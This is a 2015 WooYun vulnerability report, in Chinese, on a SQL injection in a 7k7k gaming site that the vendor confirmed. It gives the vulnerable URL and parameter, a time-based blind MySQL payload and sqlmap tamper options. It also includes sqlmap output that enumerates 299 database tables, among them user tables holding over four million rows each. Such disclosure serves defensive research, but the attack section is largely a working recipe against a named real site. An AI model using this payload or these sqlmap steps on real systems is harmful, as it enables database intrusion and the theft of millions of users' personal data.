当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112152

漏洞标题:奇客星空某站sql注射涉及400多万用户数据

相关厂商:奇客星空

漏洞作者: 路人甲

提交时间:2015-05-05 12:50

修复时间:2015-06-19 16:12

公开时间:2015-06-19 16:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

233

详细说明:

url :  http://web.7k7k.com/phone/h.php?id=
payload参考:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (9533=9533) THEN SLEEP(5) ELSE 9533*(SELECT 9
533 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---

漏洞证明:

sqlmap 跑数据的时候记得加上 tamper=between --no-cast
Database: web7k
[299 tables]
+--------------------------+
| admin_menu |
| admin_user |
| admin_user_role |
| baidu_keywordid |
| baidu_keywordid_days |
| baidu_sync_log |
| baidu_union |
| baidu_wm_days |
| gs_admin |
| gs_admin_group |
| gs_admin_menu |
| gs_charge |
| gs_charge_info |
| keyword |
| keywordid_week |
| kk_card_detail |
| kk_dealer |
| level_award |
| sogou_keywordid_days |
| sogou_sync_log |
| stat_adv_total |
| stat_money_log |
| stat_plan_category |
| testforid |
| uc_265g |
| uc_7k7kb |
| uc_7kblogs |
| uc_7kcharge |
| uc_addnum |
| uc_admin_logs |
| uc_adminlog |
| uc_adusers |
| uc_adv_category |
| uc_advert |
| uc_ahsgchoujiang |
| uc_ahsghd |
| uc_amtcount |
| uc_antecode |
| uc_antevote |
| uc_article |
| uc_asztchoujiang |
| uc_authogroup |
| uc_authority |
| uc_authormenu |
| uc_base |
| uc_binduser |
| uc_bulian |
| uc_buykk |
| uc_cardpay |
| uc_charge |
| uc_charge2011 |
| uc_charge_kkm |
| uc_chargeadduser |
| uc_chargefrom |
| uc_chargesale |
| uc_chengzi |
| uc_city |
| uc_class |
| uc_code |
| uc_codecate |
| uc_contactkf |
| uc_coop |
| uc_cps_account |
| uc_cps_confirm |
| uc_cps_rate |
| uc_cps_subuser |
| uc_cpskou |
| uc_cpslist |
| uc_cpssite |
| uc_cpsuser |
| uc_cqbyhd |
| uc_cqbynumber |
| uc_csbhchoujiang |
| uc_csbhhd |
| uc_csbhhdqd |
| uc_csbhma |
| uc_csbhrecord |
| uc_ddtchoujiang |
| uc_demouser |
| uc_dlqhd |
| uc_docochoujiang |
| uc_docohd |
| uc_downact |
| uc_downloads |
| uc_factions |
| uc_fcm |
| uc_fours |
| uc_fuchi |
| uc_gamecode |
| uc_gamecodeqxz |
| uc_gameindex |
| uc_games |
| uc_getaszt |
| uc_gethzw |
| uc_getuser |
| uc_gwactive |
| uc_hdlog |
| uc_hits |
| uc_hits_hours |
| uc_hzwchoujiang3 |
| uc_hzwhd01 |
| uc_hzwhd03 |
| uc_hzwquestion |
| uc_indexshow |
| uc_information |
| uc_integral_log |
| uc_jinjiang |
| uc_jjsgchoujiang |
| uc_jjsghd |
| uc_kanswer |
| uc_kdxyma |
| uc_kefu_question |
| uc_kefu_question_rookie |
| uc_kefu_rookie |
| uc_kefu_rookie_answer |
| uc_kefu_rookie_sh |
| uc_kefu_rookie_sh_answer |
| uc_kefu_vip |
| uc_kefu_vip_answer |
| uc_kkhuodong |
| uc_kkmao |
| uc_kquestion |
| uc_ktpd2choujiang |
| uc_ktpd2hd |
| uc_leftserverlist |
| uc_levelcharge |
| uc_levelset |
| uc_lhzschoujiang |
| uc_lhzschoujiang2 |
| uc_lhzshd |
| uc_lhzshd2 |
| uc_lhzsmtk |
| uc_loginlog |
| uc_makeReg |
| uc_makeWDReg |
| uc_mediabelong |
| uc_mediakeywords |
| uc_mediapic |
| uc_mgames |
| uc_mhit |
| uc_mthreads |
| uc_nc |
| uc_nslmchoujiang |
| uc_nslmhd |
| uc_other |
| uc_package |
| uc_package_code |
| uc_pageshow |
| uc_passlogs |
| uc_paypal |
| uc_paypalcharge |
| uc_pf |
| uc_pkddt |
| uc_pkddtuser |
| uc_pksupport |
| uc_playgame |
| uc_points |
| uc_points_record |
| uc_polling |
| uc_polls |
| uc_pwdappeal |
| uc_qq |
| uc_question |
| uc_qxzchoujiang |
| uc_qxzhd |
| uc_regFour |
| uc_sctxchoujiang |
| uc_sctxhd |
| uc_seoset |
| uc_servers |
| uc_settlement |
| uc_sign |
| uc_site |
| uc_sitepos |
| uc_sjsgchoujiang |
| uc_sjsghd |
| uc_smallpic |
| uc_sq_tuijiangame |
| uc_sqchoujiang |
| uc_sqhd |
| uc_sssghd |
| uc_subinfo |
| uc_sw |
| uc_swhours |
| uc_tg360 |
| uc_tgarticle |
| uc_tgbdnew |
| uc_tgcategory |
| uc_tgconfig |
| uc_tghao123 |
| uc_tghao123new |
| uc_tghao4 |
| uc_tghao5 |
| uc_tgmedia_image |
| uc_tgmedia_size |
| uc_tgmedia_type |
| uc_tgpage |
| uc_tgpage2 |
| uc_tgpage2345 |
| uc_tgpagehao123 |
| uc_tgpagehao123bak |
| uc_tgreg_page |
| uc_tgsgnew |
| uc_tgslides |
| uc_tgsynew |
| uc_tgxfnew |
| uc_threads |
| uc_tjaid |
| uc_tjaid2012 |
| uc_tjcount |
| uc_tjcpskou |
| uc_tjday |
| uc_tjdayold |
| uc_tjfrom |
| uc_tjgame |
| uc_tjhours |
| uc_tjmonthcount |
| uc_tjwdday |
| uc_tmpuser |
| uc_totalPay2011 |
| uc_totalPay2012 |
| uc_touchchoujiang |
| uc_touchfztp |
| uc_touchfztppl |
| uc_touchhd |
| uc_touchinfo |
| uc_touchpiao |
| uc_touchsign |
| uc_touchypcj |
| uc_touchypcj_tp |
| uc_union_day |
| uc_union_hours |
| uc_upload |
| uc_upload1 |
| uc_user0 |
| uc_user1 |
| uc_user10 |
| uc_user11 |
| uc_user12 |
| uc_user13 |
| uc_user14 |
| uc_user15 |
| uc_user16 |
| uc_user17 |
| uc_user18 |
| uc_user19 |
| uc_user2 |
| uc_user20 |
| uc_user21 |
| uc_user22 |
| uc_user23 |
| uc_user24 |
| uc_user25 |
| uc_user26 |
| uc_user27 |
| uc_user28 |
| uc_user29 |
| uc_user3 |
| uc_user30 |
| uc_user31 |
| uc_user32 |
| uc_user33 |
| uc_user34 |
| uc_user35 |
| uc_user36 |
| uc_user37 |
| uc_user38 |
| uc_user39 |
| uc_user4 |
| uc_user40 |
| uc_user41 |
| uc_user42 |
| uc_user43 |
| uc_user44 |
| uc_user45 |
| uc_user46 |
| uc_user47 |
| uc_user48 |
| uc_user49 |
| uc_user5 |
| uc_user6 |
| uc_user7 |
| uc_user8 |
| uc_user9 |
| uc_userlog |
| uc_vip |
| uc_vip_users |
| uc_vipuser |
| uc_wbcs |
| uc_webmaster |
| uc_wltemp |
| uc_wycqpwd |
| uc_xinshu |
| uc_xinshu_bzzr |
| uc_xinshu_cqby |
| uc_xinshu_login |
| uc_xinshu_mycs |
| uc_xinshu_rxtl |
| uc_zhixiao |
+--------------------------+
Database: web7k
+--------------+---------+
| Table | Entries |
+--------------+---------+
| uc_vip_users | 65420 |
+--------------+---------+
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user1 | 4279108 |
+----------+---------+
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user7 | 4273494 |
+----------+---------+

修复方案:

求20rank!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-05 16:11

厂商回复:

感谢白帽子反馈,已通知相关人员处理。

最新状态:

暂无